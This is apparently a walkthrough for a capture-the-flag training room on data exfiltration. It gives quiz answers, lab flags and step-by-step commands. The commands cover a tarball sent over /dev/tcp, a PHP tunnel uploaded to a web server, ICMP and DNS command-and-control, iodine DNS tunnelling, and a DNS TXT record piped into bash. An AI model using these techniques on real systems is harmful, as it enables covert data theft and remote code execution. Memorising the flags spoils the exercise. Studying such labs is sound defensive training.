Data Exfiltration
This guide contains the answer and steps necessary to get to them for the Data Exfiltration room.
Table of contents
- Data Exfiltration
- Exfiltration using TCP socket
- Exfiltration using SSH
- Exfiltrate using HTTP(S)
- Exfiltration using ICMP
- DNS Configurations
- Exfiltration over DNS
- DNS Tunneling
Data Exfiltration
-
In which case scenario will sending and receiving traffic continue during the connection?
This answer can be found in the text.
Click for answer
Tunneling -
In which case scenario will sending and receiving traffic be in one direction?
This answer can be found in the text.
Click for answer
Traditional data exfiltration -
In the next task, we will be discussing how data exfiltration over the TCP socket works!
Exfiltration using TCP socket
-
Exfiltration using TCP sockets relies on ____________ protocols!
The answer can be found in the text.
Click for answer
Non-standard -
Now apply what we discussed to exfiltrate data over the TCP socket! Once you exfiltrate data successfully, hitCompletedto move on to the next task!
We need to ssh into the jump server and setup a listener that outputs the result to a file.
consolessh thm@10.10.66.20 nc -nlvp 1337 > /tmp/task4-creds.dataNext we ssh into the victim1 machine through the jumpserver.
consolessh thm@10.10.66.20 ssh thm@victim1.thm.com
Next we compress and encode the data we want to exfiltrate in the 'task4' folder.
consoletar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/1337This command will also send the data over the TCP socket.
Now that the files have been transfered to the jump server, we can decode en decompress the archive to get to the files.
consoledd conv=ascii if=task4-creds.data | base64 -d > task4-creds.tar tar xvf task4-creds.tar
Exfiltration using SSH
-
All packets sent using the Data Exfiltration technique over SSH are encrypted! (T=True/F=False)
The answer can be found in the text.
Click for answer
T -
Replicate the steps to transfer data over the SSH client. Once you transfer the file successfully, hitCompletedand move on to the next task!
On victim 1 we can archive the folder and send it directly through the SSH client.
consoletar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
Exfiltrate using HTTP(S)
-
Check the Apache log file onweb.thm.comand get the flag!
After ssh'ing into the web server through the jumpserver, we can look at the log file.
consolesudo cat /var/log/apache2/access.log
This gives us the flag in base64 format. Decoding this gives us the flag.
consoleecho VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo= | base64 -d
Click for answer
THM{H77P-G37-15-f0un6} -
When you visit the http://flag.thm.com/flag website through the uploader machine via the HTTP tunneling technique, what is the flag?
First thing to do to create our HTTP tunnel using
neo-regeorgis to generate a keyconsolepython3 neoreg.py generate -k thm
Now we can upload the tunnel to the webserver at
http://10.10.230.138/uploaderwith the key 'admin'.
Next we can start the tunnel using the key and the URL to the uploaded file.
consolepython3 neoreg.py -k thm -u http://10.10.230.138/uploader/files/tunnel.php
When this is done we can use
curlto tunnel to the flag server. The proxy is bound to our machine with127.0.0.1:1080.consolecurl --socks5 127.0.0.1:1080 http://172.20.0.120:80
This is not our flag. But it does point us to the correct page.
consolecurl --socks5 127.0.0.1:1080 http://172.20.0.120:80/flag
Click for answer
THM{H77p_7unn3l1n9_l1k3_l337}
Exfiltration using ICMP
-
In which ICMP packet section can we include our data?
This answer can be found in the text.
Click for answer
data -
Follow the technique discussed in this task to establish a C2 ICMP connection between JumpBox and ICMP-Host. Then execute the "getFlag" command. What is the flag?
On the icmp server we initiate the
icmpdoorbinary and on the jump server we initiate theicmp-cncbinary.consolesudo icmpdoor -i eth0 -d 192.168.0.133consolesudo icmp-cnc -i eth1 -d 192.168.0.121Now that a connection has been established, we can send commands to the icmp server.
Click for answer
THM{g0t-1cmp-p4k3t!}
DNS Configurations
-
Once the DNS configuration works fine, resolve theflag.thm.comdomain name. What is the IP address?
Simply using the command
dig +short flag.thm.comshould give us the ip of the flag server.However, if we want to use the attack box itself, we must change its DNS settings. Edit the nameserver in the following file to
10.10.230.138:consolenano /etc/resolv.confNow this command will also work from our attack box.
Click for answer
172.20.0.120
Exfiltration over DNS
-
What is the maximum length for the subdomain name (label)?
The answer can be found in the text.
Click for answer
63 -
The Fully Qualified FQDN domain name must not exceed ______characters.
The answer can be found in the text.
Click for answer
255 -
Execute the C2 communication over the DNS protocol of the flag.tunnel.com. What is the flag?
We need to replicate the command we just did to retrieve the contents of the TXT file for the
flag.tunnel.comserver.After uploading our script ins base64 format as a TXT entry, we retrieved the content of the TXT entry with:
DNS EXFILTRATION TXT
consoledig +short -t TXT script.tunnel.comWe named the TXT entry 'script' hence the subdomain.
We can do the same but for the
flag.tunnel.comTXT entry.consoledig +short -t TXT flag.tunnel.comDNS EXFILTRATION BASE64
We need to decode the string after removing the quotes.
consoledig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -dDNS EXFILTRATION CONTENTS
This gives us a script to get our flag. We can execute it with:
consoledig +short -t TXT flag.tunnel.com | tr -d "\"" | base64 -d | bashDNS EXFILTRATION FLAG
Click for answer
THM{C-tw0-C0mmun1c4t10ns-0v3r-DN5}
DNS Tunneling
-
When the iodine connection establishes to Attacker, run theifconfigcommand. How many interfaces are? (including the loopback interface)
First we add the A and NS records to the DNS server to point to our attackbox.
DSN TUNNEL A
DNS TUNNEL NS
Now that traffic pointed towards
t1.tunnel.comwill be directed to our machine, we can setup the iodine server on the attackbox.consolesudo /sbin/iodined -f -c -P thmpass 10.1.1.1/24 t1.tunnel.comDNS TUNNEL SERVER
Then we setup the client side on the jump machine.
consolesudo iodine -f -P thmpass t1.tunnel.comDNS TUNNEL CLIENT
We can now check how many interfaces are active on the jump machine.
DNS TUNNEL INTERFACES
Click for answer
4 -
What is the network interface name created by iodined?
There is one interface that was added after establishing the connection and it is the top one in the previous image.
Click for answer
dns0 -
Use the DNS tunneling to prove your access to the webserver, http://192.168.0.100/test.php. What is the flag?
Now that the DNS tunnel is in place we can connect to the jump box through the DNS tunnel via ssh.
consolessh thm@10.1.1.2 -4 -N -f -D 1080This creates an ssh session with -D to enable the dynamic port forwarding feature to use the SSH session as a proxy using only IPv4 (-4).
DNS TUNNEL SSH
At first I thought something didn't work but later found out the the ssh session was backgrounded with the
-fargument.Now we can use two methods to connect to the local machine. Curl or Proxychains.
Using curl can be done with the following command:
consolecurl --socks5 127.0.0.1:1080 http://192.168.0.100/test.phpDNS TUNNEL CURL FLAG
For Proxychains we must first add the proxy to the config file.
consolenano /etc/proxychains4.conf # Add at the end socks5 127.0.0.1 1080Now we can also use Proxychains with:
consoleproxychains curl http://192.168.0.100/test.phpDNS TUNNEL PROXYCHAINS FLAG
Click for answer
THM{DN5-Tunn311n9-1s-c00l}